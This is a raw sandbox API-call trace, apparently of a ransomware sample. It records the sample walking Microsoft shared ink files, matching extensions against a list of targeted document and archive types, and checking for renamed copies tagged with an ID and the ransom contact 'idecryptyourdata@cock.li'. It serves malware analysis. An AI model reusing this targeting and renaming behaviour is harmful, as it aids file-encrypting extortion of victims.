lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0178.925] lstrlenW (lpString=".xlsx") returned 5 [0178.925] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0178.925] lstrlenW (lpString=".ppt") returned 4 [0178.925] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0178.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.925] lstrlenW (lpString=".zip") returned 4 [0178.925] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0178.925] lstrlenW (lpString=".rar") returned 4 [0178.925] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0178.925] lstrlenW (lpString=".bz2") returned 4 [0178.925] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0178.925] lstrlenW (lpString=".7z") returned 3 [0178.925] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0178.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.925] lstrlenW (lpString=".dbf") returned 4 [0178.925] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0178.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.925] lstrlenW (lpString=".1cd") returned 4 [0178.925] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0178.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.925] lstrlenW (lpString=".jpg") returned 4 [0178.925] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.926] lstrlenW (lpString=".doc") returned 4 [0178.926] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString=".docx") returned 5 [0178.926] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0178.926] lstrlenW (lpString=".pdf") returned 4 [0178.926] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString=".xls") returned 4 [0178.926] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString=".xlsx") returned 5 [0178.926] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0178.926] lstrlenW (lpString=".ppt") returned 4 [0178.926] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.926] lstrlenW (lpString=".zip") returned 4 [0178.926] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0178.926] lstrlenW (lpString=".rar") returned 4 [0178.926] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString=".bz2") returned 4 [0178.926] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString=".7z") returned 3 [0178.926] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0178.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.926] lstrlenW (lpString=".dbf") returned 4 [0178.926] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.926] lstrlenW (lpString=".1cd") returned 4 [0178.926] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0178.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.926] lstrlenW (lpString=".jpg") returned 4 [0178.926] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0178.927] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.927] lstrlenW (lpString="Content.xml") returned 11 [0178.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0178.927] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=27045) returned 1 [0178.927] CloseHandle (hObject=0x344) returned 1 [0178.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0178.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.928] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.928] lstrlenW (lpString=".doc") returned 4 [0178.928] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0178.928] lstrlenW (lpString=".docx") returned 5 [0178.928] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0178.928] lstrlenW (lpString=".pdf") returned 4 [0178.928] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0178.928] lstrlenW (lpString=".xls") returned 4 [0178.928] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0178.928] lstrlenW (lpString=".xlsx") returned 5 [0178.928] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0178.928] lstrlenW (lpString=".ppt") returned 4 [0178.928] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0178.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.928] lstrlenW (lpString=".zip") returned 4 [0178.928] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0178.928] lstrlenW (lpString=".rar") returned 4 [0178.928] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0178.928] lstrlenW (lpString=".bz2") returned 4 [0178.928] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0178.928] lstrlenW (lpString=".7z") returned 3 [0178.928] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0178.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.929] lstrlenW (lpString=".dbf") returned 4 [0178.929] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0178.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.929] lstrlenW (lpString=".1cd") returned 4 [0178.929] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0178.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.929] lstrlenW (lpString=".jpg") returned 4 [0178.929] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0178.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.929] lstrlenW (lpString=".doc") returned 4 [0178.929] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0178.929] lstrlenW (lpString=".docx") returned 5 [0178.929] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0178.929] lstrlenW (lpString=".pdf") returned 4 [0178.929] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0178.929] lstrlenW (lpString=".xls") returned 4 [0178.929] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0178.929] lstrlenW (lpString=".xlsx") returned 5 [0178.929] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0178.929] lstrlenW (lpString=".ppt") returned 4 [0178.929] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0178.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.929] lstrlenW (lpString=".zip") returned 4 [0178.929] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0178.930] lstrlenW (lpString=".rar") returned 4 [0178.930] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0178.930] lstrlenW (lpString=".bz2") returned 4 [0178.930] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0178.930] lstrlenW (lpString=".7z") returned 3 [0178.930] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0178.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.930] lstrlenW (lpString=".dbf") returned 4 [0178.930] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0178.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.930] lstrlenW (lpString=".1cd") returned 4 [0178.930] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0178.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0178.930] lstrlenW (lpString=".jpg") returned 4 [0178.930] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0178.930] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.930] lstrlenW (lpString="boxed-correct.avi") returned 17 [0178.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0178.931] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=111320) returned 1 [0178.931] CloseHandle (hObject=0x344) returned 1 [0178.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0178.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.931] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.931] lstrlenW (lpString=".doc") returned 4 [0178.932] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString=".docx") returned 5 [0178.932] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0178.932] lstrlenW (lpString=".pdf") returned 4 [0178.932] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString=".xls") returned 4 [0178.932] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString=".xlsx") returned 5 [0178.932] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0178.932] lstrlenW (lpString=".ppt") returned 4 [0178.932] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.932] lstrlenW (lpString=".zip") returned 4 [0178.932] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString=".rar") returned 4 [0178.932] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString=".bz2") returned 4 [0178.932] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString=".7z") returned 3 [0178.932] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0178.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.932] lstrlenW (lpString=".dbf") returned 4 [0178.932] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0178.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.932] lstrlenW (lpString=".1cd") returned 4 [0178.932] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0178.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.932] lstrlenW (lpString=".jpg") returned 4 [0178.933] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.933] lstrlenW (lpString=".doc") returned 4 [0178.933] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString=".docx") returned 5 [0178.933] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0178.933] lstrlenW (lpString=".pdf") returned 4 [0178.933] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString=".xls") returned 4 [0178.933] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString=".xlsx") returned 5 [0178.933] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0178.933] lstrlenW (lpString=".ppt") returned 4 [0178.933] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.933] lstrlenW (lpString=".zip") returned 4 [0178.933] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString=".rar") returned 4 [0178.933] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString=".bz2") returned 4 [0178.933] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString=".7z") returned 3 [0178.933] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0178.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.933] lstrlenW (lpString=".dbf") returned 4 [0178.933] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0178.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.934] lstrlenW (lpString=".1cd") returned 4 [0178.934] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0178.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0178.934] lstrlenW (lpString=".jpg") returned 4 [0178.934] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0178.934] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.934] lstrlenW (lpString="boxed-delete.avi") returned 16 [0178.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0178.934] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=48936) returned 1 [0178.935] CloseHandle (hObject=0x344) returned 1 [0178.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0178.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.935] lstrlenW (lpString=".doc") returned 4 [0178.935] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0178.935] lstrlenW (lpString=".docx") returned 5 [0178.935] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0178.935] lstrlenW (lpString=".pdf") returned 4 [0178.935] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0178.935] lstrlenW (lpString=".xls") returned 4 [0178.935] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0178.935] lstrlenW (lpString=".xlsx") returned 5 [0178.935] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0178.935] lstrlenW (lpString=".ppt") returned 4 [0178.935] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0178.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.935] lstrlenW (lpString=".zip") returned 4 [0178.935] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString=".rar") returned 4 [0178.936] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString=".bz2") returned 4 [0178.936] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString=".7z") returned 3 [0178.936] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0178.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.936] lstrlenW (lpString=".dbf") returned 4 [0178.936] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.936] lstrlenW (lpString=".1cd") returned 4 [0178.936] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0178.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.936] lstrlenW (lpString=".jpg") returned 4 [0178.936] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.936] lstrlenW (lpString=".doc") returned 4 [0178.936] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString=".docx") returned 5 [0178.936] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0178.936] lstrlenW (lpString=".pdf") returned 4 [0178.936] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString=".xls") returned 4 [0178.936] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0178.936] lstrlenW (lpString=".xlsx") returned 5 [0178.936] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0178.937] lstrlenW (lpString=".ppt") returned 4 [0178.937] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0178.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.937] lstrlenW (lpString=".zip") returned 4 [0178.937] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0178.937] lstrlenW (lpString=".rar") returned 4 [0178.937] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0178.937] lstrlenW (lpString=".bz2") returned 4 [0178.937] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0178.937] lstrlenW (lpString=".7z") returned 3 [0178.937] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0178.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.937] lstrlenW (lpString=".dbf") returned 4 [0178.937] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0178.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.937] lstrlenW (lpString=".1cd") returned 4 [0178.937] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0178.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0178.937] lstrlenW (lpString=".jpg") returned 4 [0178.937] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0178.937] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.937] lstrlenW (lpString="boxed-join.avi") returned 14 [0178.937] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0178.938] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=46622) returned 1 [0178.938] CloseHandle (hObject=0x344) returned 1 [0178.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0178.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.938] lstrlenW (lpString=".doc") returned 4 [0178.938] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString=".docx") returned 5 [0178.939] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0178.939] lstrlenW (lpString=".pdf") returned 4 [0178.939] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString=".xls") returned 4 [0178.939] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString=".xlsx") returned 5 [0178.939] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0178.939] lstrlenW (lpString=".ppt") returned 4 [0178.939] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.939] lstrlenW (lpString=".zip") returned 4 [0178.939] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString=".rar") returned 4 [0178.939] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString=".bz2") returned 4 [0178.939] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString=".7z") returned 3 [0178.939] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0178.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.939] lstrlenW (lpString=".dbf") returned 4 [0178.939] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0178.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.939] lstrlenW (lpString=".1cd") returned 4 [0178.939] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0178.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.939] lstrlenW (lpString=".jpg") returned 4 [0178.940] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.940] lstrlenW (lpString=".doc") returned 4 [0178.940] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString=".docx") returned 5 [0178.940] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0178.940] lstrlenW (lpString=".pdf") returned 4 [0178.940] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString=".xls") returned 4 [0178.940] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString=".xlsx") returned 5 [0178.940] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0178.940] lstrlenW (lpString=".ppt") returned 4 [0178.940] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.940] lstrlenW (lpString=".zip") returned 4 [0178.940] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString=".rar") returned 4 [0178.940] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString=".bz2") returned 4 [0178.940] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString=".7z") returned 3 [0178.940] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0178.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.940] lstrlenW (lpString=".dbf") returned 4 [0178.940] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0178.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 